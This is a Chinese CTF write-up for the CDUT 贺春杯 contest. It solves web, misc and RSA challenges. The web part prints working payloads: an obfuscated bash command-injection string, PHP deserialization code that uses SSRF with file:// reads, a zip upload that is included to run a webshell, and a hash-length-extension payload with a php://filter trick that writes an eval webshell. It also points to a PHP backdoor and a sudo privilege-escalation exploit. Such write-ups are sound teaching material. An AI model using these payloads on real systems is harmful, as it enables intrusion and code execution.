CDUT贺春杯web全wp
WEB
Can Can Need HTTP
加头抓包base64解码
pacman
手动打开开发者工具
看代码
搜索flag在fame.js找到了加密的flag
Rot47解码得到flag
ez_disable
查看源码得到提示game.php
反序列化
<?php
#本页面如有雷同,纯属抄袭
highlight_file(__FILE__);
class HelloPhp
{
public $a=4;
public $b='phpinfo';
public function __construct(){
$this->a = "Y-m-d h:i:s";
$this->b = "date";
}
public function __destruct(){
$a = $this->a;
$b = $this->b;
echo $b($a);
}
}
$c = new HelloPhp;
$c->a=4;
$c->b='phpinfo';
echo serialize($c);
发现disable_function
非预期:没过滤highlight_file直接读取/flag得到flag
ez_rce
工具生成payload然后传参url编码
用burp,hackbar传不了
__=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$(())\\$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'
crazy_cve
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。
上传工具https://github.com/mzet-/linux-exploit-suggester.git
扫描内核漏洞
Cve-2021-3156利用
Github找exp都试过了
非交互式不行
因为反弹的shell不是交互式
可在shell输入script /dev/null -c bash修改为交互式或用非交互式exp
https://github.com/CptGibbon/CVE-2021-3156
What can I say
输入科比英文名
得到源码
源码下面有get函数传了ur参数l,curl_exec会造成ssrf
还附带反序列化
<?php
function get($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
curl_close($curl);
echo base64_encode($data);
return $data;
}
class client{
public $url;
public $payload;
public function __construct()
{
$url = "what can I say?";
$payload = "man!";
echo "Exploit"."\n";
}
public function __destruct()
{
get($this->url);
}
}
$a=new client;
$a->url='file:///var/www/html/s1e2c3r4e5t.php';
echo serialize($a);
读取文件s1e2c3r4e5t.php
O:6:"client":2:{s:3:"url";s:36:"file:///var/www/html/s1e2c3r4e5t.php";s:7:"payload";N;}
Base64解码得到/secret
读/secret
O:6:"client":2:{s:3:"url";s:14:"file:///secret";s:7:"payload";N;}
两次base64解码得到
secr3t.html
读secr3t.html
文件上传的代码
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>What can I say ?</title>
<link rel="stylesheet" href="2.css">
</head>
<body>
<p>
牢大把他所有好看的东西压缩成了zip文件都存在了这里。什么,你也想存一个?
</p>
<form action="u1p2l3o4a5d.php" method="post" enctype="multipart/form-data">
<!--链接是当前打开的题目链接-->
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="我没意见">
</form>
</body>
</html>
读u1p2l3o4a5d.php
能上传zip文件
然后include文件包含
$_GET['action'][0] === '/' || substr_count($_GET['action'], '/') > 1)
传的参数只能有一个/ ,且不能在第一个
<!DOCTYPE html>
<html>
<head>
<title>PHP与HTML示例</title>
</head>
<body>
<!-- 怎么才能读到源码呢? -->
<?php
if(isset($_FILES['file'])) {
$file = $_FILES['file'];
$file_tmp = $file['tmp_name'];
// 获取文件名和后缀
$fileName = $file['name'];
$fileExt = pathinfo($fileName, PATHINFO_EXTENSION);
// 检查文件后缀是否为 zip
if($fileExt === 'zip') {
$uploadDir = __DIR__ . '/upload/';
if(!is_dir($uploadDir)) {
mkdir($uploadDir);
}
// 移动文件到上传目录
$uploadPath = $uploadDir . $fileName;
if(move_uploaded_file($file['tmp_name'], $uploadPath)) {
echo '文件上传成功!'."\n上传路径是upload! ";
} else {
echo '文件上传失败!';
}
} else {
echo $file['tmp_name'];
echo '请上传后缀为 zip 的文件!';
}
} else {
echo '没有上传文件!';
}
if (isset($_GET['action'])) {
if ($_GET['action'][0] === '/' || substr_count($_GET['action'], '/') > 1) {
die('<h1>Invalid action</h1>');
}
die(include($_GET['action']));
}
?>
</body>
</html>
发现传的zip文件在upload里面
把给的上传文件的代码改路径为
http://dino-ctf.kengwang.com.cn:33820/u1p2l3o4a5d.php
本地上传抓包
我开始还以为是临时文件包含
发现对action参数规定了,是我想多了,直接包含zip就行了
Zip文件传马
传参数action=upload/1.zip包含成功
Do or DIE
<?php
highlight_file(__FILE__);
include 'secret.php';
$input = base64_decode($_REQUEST['content']);
$userhash = $_REQUEST['hash'];
$content = $secret . $input;
if (md5($secret) !== '37870febc8d470109a867802b8031454')
{
exit("No no, Don't change the secret.");
}
echo "Secret's length is " . strlen($secret) . " ";
$hash = md5($content);
// Is that enough? Let's see...
if (strlen($userhash) == 32 && $hash === $userhash) {
echo "Congratulations! I will write your input into file.";
$filename = explode("[[", $input)[1];
// take it easy, i will change the return for you
$filename = str_replace("\\n", "\n", str_replace("\0",'',$filename));
$content = $secret . $filename;
file_put_contents($filename, $content);
} else {
exit("Think Extensively.");
} Secret's length is 13 Think Extensively.
hashpump攻击脚本
https://github.com/shellfeel/hash-ext-attack
输入得到payload和hash
因为base64_decode($_REQUEST['content']所以要url解码后在base64加密
Payload=gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgAAAAAAAAAMQ==&hash=126178a25b3f21594683f858c4169aea
绕过strlen($userhash) == 32 && $hash === $userhash
explode("[[", $input)[1];对filename以[[分割
file_put_contents($filename, $content);可写文件所以尝试写文件
尝试随便输入文件名1[[1.txt尝试读secret
发现<?php die();
所以secret为<?php die(); (注意有个空格在;后面刚好13个字符)
上传的文件名和文件内容为filename以[[分割后的值
要想执行命令需要上传木马,还要绕过<?php die();
可以通过伪协议上传并绕过死亡die
https://www.freebuf.com/articles/web/266565.html
Payload为php://filter/convert.iconv.UCS-2LE.UCS-2BE|?<hp pe@av(l_$OPTSa[]b;)>?/resource=1111.php
可以向shell.php写入一句话
hashpump生成payload
尝试传入发现不行,是$secret . $input有问题导致明文不一致
但都知道secret的值了可以直接算出本地算出hash
源码加上
echo $hash."<br>";
echo $userhash;
得到了hash
e74084050b093c3ba4d027764f6f25c3
最终payload
content=gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGgAAAAAAAAAMVtbcGhwOi8vZmlsdGVyL2NvbnZlcnQuaWNvbnYuVUNTLTJMRS5VQ1MtMkJFfD88aHAgcGVAYXYobF8kT1BUU2FbXWI7KT4/L3Jlc291cmNlPTExMTEucGhw&hash=e74084050b093c3ba4d027764f6f25c3
访问1111.php执行命令得到flag
Misc
[签到] Where are you from
扫码
[AI] 签到
发送F+l+a+g
多发几遍获得
[AI] Repeat
多发送几遍
ezRSA
import gmpy2
from Crypto.Util.number import *
e = 3
k = 0
n = 345675713266547546727997788631735009412387157990066144394619901220478972853548799919916572067895437774688186483367134372170356307628474622726432885853473078843359790348707975349499704660462018761449242448381765593725869513432095247724237852265875808599860098758473511684359800791176948572617684399894397044344654638787
c = 165527641537962453158385346595580222293326378381594431827597366486166401160303849028319637296466564187067059992600278363170882182385646208386765262608536513136513222747556263528436428933807161852842186912918227517362704487324744539937359952905722677507738750871327455083935808647964763470500287612530277
while True:
m = c + n * k
result,flag = gmpy2.iroot(m, e)
if True == flag:
k += 1
print(long_to_bytes(result))
break
babyRSA
import binascii
from Crypto.Util.number import *
from gmpy2 import gmpy2, gcd
c = 10932604176513734732642644739013766190370510418964500085862933942045091578369521100472426717396594808004640523692279971921192683610211148286344036517897443998601693549183653899911653571742388751855501361352838795294992263198412628619259073194881553706853661988660073255569085903560622481782154330516013335368381792445224359104595030894011481065182943873429786749975516378694534701343694402608971501249376752615753460732093220172427175968648033242055672487462297028197421381531094038001817985360123501972323514807585698794257868353706521404131931443443756020865951091341400094707383170530192393124794033344399666571408
n=11712524030293309654181181855678363759794247224525779106330211030817195365025576057372938941825425546606829893890243829324014303287268525223630441917419083195163670800431999939131322425181056157475833848545354092363059711949494784285064665567294739108791344303884977917817407804914544927276232038783004100462571067986849206208106840023319590819132200734298453415736042206582049274338697897660917061823264074808094800086127838998617100751205121777719633868236664779348479443624660313549335824200213092271831335171514155511155085049706610909088188430469786369188628112138288525519361491128603935723326052406415679869531
e = 0x10001
print(e)
p = 118529626191137904381959516033168238396890774566175797535387557533815459390404563077126970184352405038866997191975928822377025782216693480077061212555272846077009773427602423986278058961198428172618282145082203661214568421914460855776080866492675432605185134318219618863296218409682523207019569884403102670773
q = n//p
fi = (p - 1) * (q - 1)
d = pow(e, -1, fi)
m = pow(c, d, p*q)
print(long_to_bytes(m))
浙公网安备 33010602011771号